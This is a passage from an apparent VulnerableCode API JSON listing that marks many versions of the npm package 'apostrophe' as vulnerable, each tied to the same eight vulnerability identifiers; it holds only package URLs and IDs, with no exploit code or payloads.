packages/pkg:npm/apostrophe@0.5.352"},{"url":"http://public2.vulnerablecode.io/api/packages/268436?format=json","purl":"pkg:npm/apostrophe@0.5.353","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.353"},{"url":"http://public2.vulnerablecode.io/api/packages/268437?format=json","purl":"pkg:npm/apostrophe@0.5.354","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.354"},{"url":"http://public2.vulnerablecode.io/api/packages/268438?format=json","purl":"pkg:npm/apostrophe@0.5.355","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.355"},{"url":"http://public2.vulnerablecode.io/api/packages/268439?format=json","purl":"pkg:npm/apostrophe@0.5.356","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.356"},{"url":"http://public2.vulnerablecode.io/api/packages/268440?format=json","purl":"pkg:npm/apostrophe@0.5.357","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.357"},{"url":"http://public2.vulnerablecode.io/api/packages/268441?format=json","purl":"pkg:npm/apostrophe@0.5.358","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.358"},{"url":"http://public2.vulnerablecode.io/api/packages/268442?format=json","purl":"pkg:npm/apostrophe@0.5.359","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.359"},{"url":"http://public2.vulnerablecode.io/api/packages/268443?format=json","purl":"pkg:npm/apostrophe@0.5.360","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.360"},{"url":"http://public2.vulnerablecode.io/api/packages/268444?format=json","purl":"pkg:npm/apostrophe@0.5.361","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.361"},{"url":"http://public2.vulnerablecode.io/api/packages/268445?format=json","purl":"pkg:npm/apostrophe@0.5.362","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.362"},{"url":"http://public2.vulnerablecode.io/api/packages/268446?format=json","purl":"pkg:npm/apostrophe@0.5.363","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.363"},{"url":"http://public2.vulnerablecode.io/api/packages/268447?format=json","purl":"pkg:npm/apostrophe@0.5.364","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.364"},{"url":"http://public2.vulnerablecode.io/api/packages/268448?format=json","purl":"pkg:npm/apostrophe@0.5.367","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.367"},{"url":"http://public2.vulnerablecode.io/api/packages/268449?format=json","purl":"pkg:npm/apostrophe@0.5.368","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.368"},{"url":"http://public2.vulnerablecode.io/api/packages/268450?format=json","purl":"pkg:npm/apostrophe@0.5.369","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.369"},{"url":"http://public2.vulnerablecode.io/api/packages/268451?format=json","purl":"pkg:npm/apostrophe@0.5.370","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.370"},{"url":"http://public2.vulnerablecode.io/api/packages/268452?format=json","purl":"pkg:npm/apostrophe@0.5.371","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.371"},{"url":"http://public2.vulnerablecode.io/api/packages/268453?format=json","purl":"pkg:npm/apostrophe@0.5.372","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.372"},{"url":"http://public2.vulnerablecode.io/api/packages/268454?format=json","purl":"pkg:npm/apostrophe@0.5.373","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.373"},{"url":"http://public2.vulnerablecode.io/api/packages/268455?format=json","purl":"pkg:npm/apostrophe@0.5.374","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.374"},{"url":"http://public2.vulnerablecode.io/api/packages/268456?format=json","purl":"pkg:npm/apostrophe@0.5.375","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.375"},{"url":"http://public2.vulnerablecode.io/api/packages/268457?format=json","purl":"pkg:npm/apostrophe@0.5.376","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.376"},{"url":"http://public2.vulnerablecode.io/api/packages/268458?format=json","purl":"pkg:npm/apostrophe@0.5.377","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.377"},{"url":"http://public2.vulnerablecode.io/api/packages/268459?format=json","purl":"pkg:npm/apostrophe@0.5.378","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.378"},{"url":"http://public2.vulnerablecode.io/api/packages/268460?format=json","purl":"pkg:npm/apostrophe@0.5.379","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.379"},{"url":"http://public2.vulnerablecode.io/api/packages/268461?format=json","purl":"pkg:npm/apostrophe@0.5.380","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.380"},{"url":"http://public2.vulnerablecode.io/api/packages/268462?format=json","purl":"pkg:npm/apostrophe@0.5.381","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.381"},{"url":"http://public2.vulnerablecode.io/api/packages/268463?format=json","purl":"pkg:npm/apostrophe@0.5.382","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.382"},{"url":"http://public2.vulnerablecode.io/api/packages/268464?format=json","purl":"pkg:npm/apostrophe@0.5.383","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.383"},{"url":"http://public2.vulnerablecode.io/api/packages/268465?format=json","purl":"pkg:npm/apostrophe@0.5.384","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.384"},{"url":"http://public2.vulnerablecode.io/api/packages/268466?format=json","purl":"pkg:npm/apostrophe@0.5.385","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.385"},{"url":"http://public2.vulnerablecode.io/api/packages/268467?format=json","purl":"pkg:npm/apostrophe@0.5.386","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.386"},{"url":"http://public2.vulnerablecode.io/api/packages/268468?format=json","purl":"pkg:npm/apostrophe@0.5.387","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.387"},{"url":"http://public2.vulnerablecode.io/api/packages/268469?format=json","purl":"pkg:npm/apostrophe@0.5.388","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.388"},{"url":"http://public2.vulnerablecode.io/api/packages/268470?format=json","purl":"pkg:npm/apostrophe@0.5.389","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.389"},{"url":"http://public2.vulnerablecode.io/api/packages/268471?format=json","purl":"pkg:npm/apostrophe@0.5.390","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.390"},{"url":"http://public2.vulnerablecode.io/api/packages/268472?format=json","purl":"pkg:npm/apostrophe@0.5.391","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.391"},{"url":"http://public2.vulnerablecode.io/api/packages/268473?format=json","purl":"pkg:npm/apostrophe@0.5.392","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.392"},{"url":"http://public2.vulnerablecode.io/api/packages/268474?format=json","purl":"pkg:npm/apostrophe@0.5.393","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.393"},{"url":"http://public2.vulnerablecode.io/api/packages/268475?format=json","purl":"pkg:npm/apostrophe@2.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268476?format=json","purl":"pkg:npm/apostrophe@2.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.0.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268477?format=json","purl":"pkg:npm/apostrophe@2.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268478?format=json","purl":"pkg:npm/apostrophe@2.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268479?format=json","purl":"pkg:npm/apostrophe@2.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5